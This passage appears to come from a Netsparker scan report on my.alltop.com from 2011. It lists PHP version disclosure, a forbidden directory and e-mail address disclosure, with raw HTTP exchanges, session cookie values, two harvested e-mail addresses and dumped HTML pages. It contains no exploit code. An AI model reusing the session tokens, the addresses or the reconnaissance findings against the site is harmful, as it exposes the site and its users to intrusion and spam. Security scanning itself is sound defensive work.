Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Tue, 08 Mar 2011 20:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:01 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Location: http://alltop.com/?keywords=topic
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 0


PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /topic/work

/topic/work

http://my.alltop.com/topic/work

Extracted Version

PHP/5.2.17

Request

GET /topic/work HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Tue, 08 Mar 2011 20:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:01 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Location: http://alltop.com/?keywords=topic
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 0


Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /css/

/css/ CONFIRMED

http://my.alltop.com/css/

Request

GET /css/ HTTP/1.1
Referer: http://my.alltop.com/css/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:01 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:01 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('password-change').style.display='none';
$(form_el_id).style.display='block';
if (sout) {
accountsSlider.slideOut();
window.setTimeout(function(){
$(form_el_id).style.display='none';
$('slide-wrapper').style.top='-190px';
$('slide-wrapper').style.zIndex='0';
}, 550);
shown_form_id ..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /alisonvandiggelen

/alisonvandiggelen

http://my.alltop.com/alisonvandiggelen

Found E-mails

  • tom@redmonk.com
  • info@greentechmedia.com

Request

GET /alisonvandiggelen HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:55:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:55:03 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:55:03 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:55:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 26211
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alisonvandiggelen</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alisonvandiggelen websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alisonvandiggelen/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alisonvandiggelen </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 03-02-2011 Technology</a></h3> <div class="full-post"> <div class="site-title">NPR: Technology Podcast</div> <div class="author">NPR</div> <div class="published">2 Mar 2011 | 8:23 pm</div> <div class="entry-content"> <div class="entry-bound">Stories: 1) High-Tech Rearview Mirror Can Curb Blind Spots 2) Examining Tablet Computer Craze</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/treehuggersite/~3/Z-SFa0TFF9U/jon-stewart-environmental-protections-rand-paul-video.php" rel="bookmark" target="_blank">Jon Stewart Explains Why We Need Environmental Protections to Rand Paul (Video)</a></h3> <div class="full-post"> <div class="site-title">TreeHugger</div> <div class="published">8 Mar 2011 | 12:17 pm</div> <div class="entry-content"> <div class="entry-bound">You may have heard something about the huge push in Congress to overturn or weaken some of our nation's central environmental laws. Politicians want to pull back the scope of the Clean Air & Water Acts to allow polluters to skirt expensive upgrades to cleaner equipment and practices. They argue that such regulations are an impediment to business, and with our weakened economy, we can't afford to make corporations pay for their pollution. But how else</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1025" rel="bookmark" target="_blank">NPR: 03-03-2011 Environment</a></h3> <div class="full-post"> <div class="site-title">NPR: Environment Podcast</div> <div class="author">NPR</div> <div class="published">3 Mar 2011 | 8:31 pm</div> <div class="entry-content"> <div class="entry-bound">Stories: 1) Oscars Accessory Checklist: Handbag, Heels, Hybrid 2) Gulf Spill Investigated As Cause Of Dolphin Deaths 3) Bilingual Babies More Perceptive To Nonnative Tongues 4) Back To Tradition, Bringing Home The Bison 5) The Art Of War On Invasive Species 6) A Growing Debate: How To Define 'Organic' Food</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/EnvironmentalNewsNetwork/~3/Fz6pdMsn9vc/42435" rel="bookmark" target="_blank">Countries agree to manage fishing in Northeast Pacific</a></h3> <div class="full-post"> <div class="site-title">Environment News Network</div> <div class="published">8 Mar 2011 | 4:08 am</div> <div class="entry-content"> <div class="entry-bound">Countries bordering the North Pacific Ocean have struck a deal that environmentalists said on Monday will help protect 16.1 million square miles (41.7 million sq km) of ocean floor from a destructive technique called bottom trawl fishing. The agreement calls for the creation of an organization to manage sea bottom fisheries in the North Pacific, and puts an immediate cap on expansion of bottom trawl fishing in international waters stretching from Hawaii to Alaska. The deal was reached last week in Vancouver by the United States, Japan, Canada, China, South Korea, Russia and Taiwan after&hellip;</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.huffingtonpost.com/2011/03/08/wyoming-ait-pollution-gas-drilling_n_833027.html" rel="bookmark" target="_blank">Wyoming Smog Worse Than Los Angeles Due To Gas Drilling</a></h3> <div class="full-post"> <div class="site-title">Huffington Post: Latest Green News</div> <div class="author">AP</div> <div class="published">8 Mar 2011 | 11:50 am</div> <div class="entry-content"> <div class="entry-bound">CHEYENNE, Wyo. -- Wyoming, famous for its crisp mountain air and breathtaking, far-as-the-eye-can-see vistas, is looking a lot like smoggy Los Angeles these days because of a boom in natural gas drilling. Folks who live near the gas fields in the western part of this outdoorsy state are complaining of watery eyes, shortness of breath and bloody noses because of ozone levels that have exceeded what people in L.A. and other major cities wheeze through on their worst pollution days. "It is scary to me personally. I never would have guessed in a million years you would have that kind of danger&hellip;</div> </div> </div> </li> </ul> <ul id="feed199793" class="feed-block 381811c30f2a22a2f9212b18a0df7761"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" target="_blank" class="snap_shots">NPR: Technology Podcast</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 03-02-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">2 Mar 2011 | 8:23 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) High-Tech Rearview Mirror Can Curb Blind Spots 2) Examining Tablet Computer Craze</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 02-23-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">23 Feb 2011 | 8:16 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) Internet Freedom And U.S. State Department 2) Who Is The New Overlord? 3) I'll Take 'New Computer Overlords' For 